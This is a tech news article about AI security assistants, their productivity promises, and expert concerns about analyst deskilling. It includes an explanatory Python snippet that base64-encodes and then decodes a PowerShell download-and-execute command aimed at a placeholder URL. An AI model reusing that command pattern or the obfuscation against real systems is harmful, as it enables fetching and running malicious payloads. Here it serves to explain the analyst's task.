AI security tools promise to supercharge productivity, but experts worry cyber pros could become too reliant
AI security tools will deliver a productivity boost by automating tasks that frequently bog down cyber professionals, but some industry experts worry teams could become too reliant on these systems
As AI seeps into every corner of the tech sector and beyond, a wave of security tools has flooded the market, promising to simplify cyber operations for enterprises and practitioners.
A significant part of the value proposition vendors are making for AI security assistants is that companies can free up swamped security teams by automating the more mundane, repetitive tasks in their workflows.
Many of the latest security assistants unveiled by Microsoft, Cisco, Check Point, and others can automate tasks that used to bog down workers, such as organizing the overwhelming stream of alerts security teams deal with every day.
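For a sense of what "organizing alerts" means in practice, here is a minimal, hypothetical Python sketch that deduplicates a stream of alerts and surfaces the highest-severity items first; the kind of rote triage these assistants aim to take off analysts' plates. The alert data and field names are illustrative, not drawn from any particular product.

```python
from collections import Counter

# Hypothetical alert stream; real feeds come from a SIEM and are far noisier.
alerts = [
    {"rule": "failed_login_burst", "host": "web-01", "severity": 3},
    {"rule": "failed_login_burst", "host": "web-01", "severity": 3},
    {"rule": "new_admin_account", "host": "dc-01", "severity": 9},
    {"rule": "port_scan", "host": "web-02", "severity": 5},
    {"rule": "failed_login_burst", "host": "web-01", "severity": 3},
]

# Collapse duplicates (same rule on the same host) and count occurrences.
counts = Counter((a["rule"], a["host"]) for a in alerts)
severity = {(a["rule"], a["host"]): a["severity"] for a in alerts}

# Surface the highest-severity, most frequent items first.
triaged = sorted(counts, key=lambda k: (-severity[k], -counts[k]))
for rule, host in triaged:
    print(f"sev {severity[(rule, host)]:>2}  x{counts[(rule, host)]}  {rule} on {host}")
```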
Research from Mandiant in 2023 specifically highlighted “information overload” as a key barrier to effective threat intelligence. It’s an issue that plagues security teams across the industry, the company said, and one that contributes to staff burnout and poorer performance.
In theory, AI security tools should allow security staff to focus on critical tasks that require a human’s attention. Research from Censornet, for example, found 49% of SMBs think AI will boost their cyber defenses by freeing up security teams to proactively investigate risks.
After announcing its Copilot for Security would be rolled out to general availability from 1 April 2024, Microsoft claimed its assistant could carry out documentation tasks, a common pain point for security teams, 46% faster than a human and with greater accuracy.
Another task that frequently consumes security professionals' time is manually reverse engineering obfuscated scripts. Attackers obfuscate the scripts in their attack chains to conceal their methods and keep victims in the dark.
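To make the problem concrete, here is a minimal, hypothetical Python sketch of the simplest form of this trick, base64 encoding, showing both how an attacker hides a command and the single step an analyst (or an AI assistant) performs to reverse it. The command and URL are defanged placeholders, and real attack chains layer several techniques (string splitting, junk code, multiple encodings) on top of one another.

```python
import base64

# The command an attacker actually wants to run.
# (Hypothetical, defanged example: the URL and payload name are placeholders.)
command = (
    "powershell -nop -c "
    "\"IEX((New-Object Net.WebClient).DownloadString('http://example.com/payload.ps1'))\""
)

# How the attacker hides it: the dropper script only ever contains this blob.
obfuscated = base64.b64encode(command.encode()).decode()
print("obfuscated:", obfuscated)

# How an analyst reverses it: decode the blob to recover the real command.
recovered = base64.b64decode(obfuscated).decode()
assert recovered == command
print("recovered: ", recovered)
```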
With skills gaps plaguing the security sector, finding security staff who have the expertise and experience to manually decode these scripts is becoming an uphill task for businesses.
Microsoft, naturally, said its tool will unlock huge productivity gains by enabling junior security analysts to reverse engineer these scripts without constantly consulting senior colleagues.
No longer reliant on their more knowledgeable senior colleagues, junior security staff will be able to use AI assistants to take on tasks that might have previously been above their skill level, but what does this actually mean for their development?
If new cyber professionals forgo the process of learning from senior staff, who might pass on handy tricks of the trade or identify gaps in their knowledge, will their skill levels suffer as a result of these new security copilots?
Do teams risk becoming over-reliant on AI security tools?
Speaking to ITPro, Jeff Watkins, chief product and technology officer at xDesign, said the benefits AI adoption can bring to cyber security are clear, specifically in terms of automation.
“If there’s one field that has a huge potential for AI adoption, outside of the blindingly obvious customer support/CRM, it’s cyber security”, he explained.
“From attack analysis and simulations to reverse engineering and adaptive countermeasures, there’s a lot of potential in the area to intelligently automate processes and content generation. In many ways, this is a good thing, given the size of most security teams, as even in a well-resourced organization there’s usually one security professional per 100 developers/technologists.”
But concerns around skills erosion are legitimate, Watkins noted, citing the digital amnesia associated with ‘The Google Effect’ and a worst-case scenario in which underskilled cyber professionals are left powerless against sophisticated new attacks.
“There’s a number of important factors in AI adoption in the context of cyber security, the first of which is analogous to ‘The Google Effect’. With too much AI assistance, there’s a chance that security engineers could end up relying entirely on how to leverage the AI assistant over actually learning how to problem solve themselves,” he warned.
“This has greater potential for impact in an organization that uses AI tooling in lieu of a good mentorship and pairing/shadowing approach.”
“The nightmare scenario is that cyber security allows itself to become deskilled in organizations, meaning innovative new threats leave the team feeling helpless to problem-solve their way out of the situation.”
AI is no cyber “silver bullet”, but it could actually help cyber skills
Chris Stouff, chief strategy officer at Armor Defense, told ITPro it’s important businesses recognize the proficiencies and limitations of AI assistants, highlighting the continued importance of a robust, human-led security operations center (SOC).
“I think the representation of AI as a cyber security ‘silver bullet’ is a dangerous one. Whilst I agree its use will be beneficial for things like the automation of repetitive security tasks, what concerns me is the inference that AI, like some of the security products and services hailed before it, could become a standalone solution which will somehow negate the requirement for an effective Security Operations Center (SOC).”
Stouff explained why AI is not the panacea that struggling security leaders might hope for, lacking a human’s situational awareness, judgment, and ability to prioritize tasks.
Mike Isbitski, director of cybersecurity strategy at security and monitoring company Sysdig, echoed these thoughts and cautioned against exaggerating the effect AI will have on skill levels among cyber professionals.
Isbitski noted that, long-term, AI assistants could actually help junior team members improve skills.
"Concerns about security teams becoming complacent with overuse of AI to do their work are overblown,” he said.
“The rapid adoption of generative AI is akin to calculators and computers becoming pervasive in the classrooms over the past few decades. It's an inevitability, and generative AI is yet another powerful tool. The technology should be embraced as it'll allow junior practitioners to skill up faster and security programs to scale appropriately in order to mitigate advanced threats."
Solomon Klappholz is a Staff Writer at ITPro. He has experience writing about the technologies that facilitate industrial manufacturing, which led him to develop a particular interest in IT regulation, industrial infrastructure applications, and machine learning.